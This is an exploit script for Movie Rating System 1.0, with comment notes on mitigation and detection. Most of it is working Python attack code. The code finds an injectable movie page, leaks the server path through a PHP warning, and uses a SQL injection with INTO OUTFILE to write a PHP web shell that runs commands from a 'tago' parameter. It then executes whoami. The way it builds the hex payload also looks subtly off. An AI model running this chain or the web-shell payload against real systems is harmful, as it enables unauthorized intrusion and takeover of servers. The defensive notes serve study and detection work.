Movie Rating System version 1.0 suffers from a remote SQL injection vulnerability that can allow an attacker to escalate to remote code execution.
491fb40d4c23f9004cab9584a482c0e8
# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Ubuntu
# This exploit only works correctly if the application's database user has
# administrator privileges; if it does not, continue with plain SQL injection payloads.
#
# Reviewer notes (defensive reading of this proof of concept):
#   The chain below has three observable stages, each leaving a distinct trace:
#     1. an error-based probe (a single quote appended to the movie page's query
#        string) that relies on PHP printing a "Warning" containing the script's
#        absolute path into the HTTP response;
#     2. a SELECT ... INTO OUTFILE injection that writes a PHP file into the
#        directory recovered in stage 1 — this only succeeds when the database
#        account holds the FILE privilege, secure_file_priv does not restrict the
#        output location, and the database server process can write to the web root;
#     3. a GET to the written file carrying a "tago" query parameter.
#   Mitigations that break the chain: a parameterized query for the movie id,
#   display_errors off in production, a least-privileged database account
#   (without FILE), secure_file_priv set, and a web root the database process
#   cannot write to.
#   Detection: query strings containing INTO OUTFILE / LINES TERMINATED BY /
#   0x-prefixed hex literals, PHP warnings leaking in responses, and the creation
#   of unexpected .php files with random 15-letter names in the web root.
import requests
import random
import string
from bs4 import BeautifulSoup

# Normalise the target so every later request can be built by string concatenation.
url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

# The file content the injection writes: hands the "tago" parameter to system().
payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
# Random 15-letter lowercase name for the written file.
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))

# Stage 0: crawl the landing page for the nav link whose text mentions "movie".
# selectPage stays "" when no such link exists.
resp = requests.get(url)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
getMenu = htmlParser.findAll("a", {"class": "nav-link"})
selectPage = ""
for i in getMenu:
    if "movie" in i.text.lower():
        selectPage = i["href"]
        break
selectPage = selectPage.replace("./","")
findSql = url + selectPage

# The first movie card's href is the page whose query parameter gets injected.
# movieList[0] raises IndexError when the listing has no cards.
resp = requests.get(findSql)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})
sqlPage = movieList[0]["href"]
sqlPage = sqlPage.replace("./","")
sqlPage = url + sqlPage

# Stage 1: append a stray quote and scrape the PHP warning for the script path.
# The index() calls raise ValueError when the response carries no such warning
# (e.g. display_errors is off), which ends the script at this point.
print("\nFinding path")
findPath = requests.get(sqlPage + '\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
print("injection page: "+sqlPage)
# Rebuild the directory part of the leaked path: split on backslashes (assumes a
# backslash-separated path), drop the final component (presumably the script
# file name) and re-join the rest with "/".
parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
    findPath += find + "/"
print("\nFound Path : " + findPath)

# Stage 2: SELECT ... INTO OUTFILE into the recovered directory, with the PHP
# source supplied as a hex literal.
SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
print("\n\nShell Uploading...")
# The response is not inspected; success is only confirmed by stage 3.
status = requests.get(sqlPage+SQLtoRCE)

# Stage 3: request the written file and print whatever the server returns.
shellOutput = requests.get(url+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
print("\nShell Path : " + url+shellname+".php")